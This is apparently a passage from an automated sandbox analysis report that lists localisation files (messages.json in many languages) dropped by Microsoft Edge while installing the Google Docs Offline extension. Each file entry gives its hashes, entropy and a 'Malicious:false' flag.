                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\my\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):3830
                                                        Entropy (8bit):3.5483353063347587
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:342335A22F1886B8BC92008597326B24
                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ne\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1898
                                                        Entropy (8bit):4.187050294267571
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\nl\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):914
                                                        Entropy (8bit):4.513485418448461
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\no\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):878
                                                        Entropy (8bit):4.4541485835627475
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\pa\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2766
                                                        Entropy (8bit):3.839730779948262
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                        SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                        SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                        SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\pl\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):978
                                                        Entropy (8bit):4.879137540019932
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\pt_BR\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):907
                                                        Entropy (8bit):4.599411354657937
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\pt_PT\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):914
                                                        Entropy (8bit):4.604761241355716
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ro\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):937
                                                        Entropy (8bit):4.686555713975264
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ru\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1337
                                                        Entropy (8bit):4.69531415794894
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\si\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2846
                                                        Entropy (8bit):3.7416822879702547
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\sk\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):934
                                                        Entropy (8bit):4.882122893545996
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\sl\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):963
                                                        Entropy (8bit):4.6041913416245
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\sr\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1320
                                                        Entropy (8bit):4.569671329405572
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7F5F8933D2D078618496C67526A2B066
                                                        SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                        SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                        SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\sv\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):884
                                                        Entropy (8bit):4.627108704340797
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                        SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                        SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                        SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\sw\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):980
                                                        Entropy (8bit):4.50673686618174
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:D0579209686889E079D87C23817EDDD5
                                                        SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                        SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                        SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ta\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1941
                                                        Entropy (8bit):4.132139619026436
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                        SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                        SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                        SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                        Malicious:false
                                                        Reputation:unknown
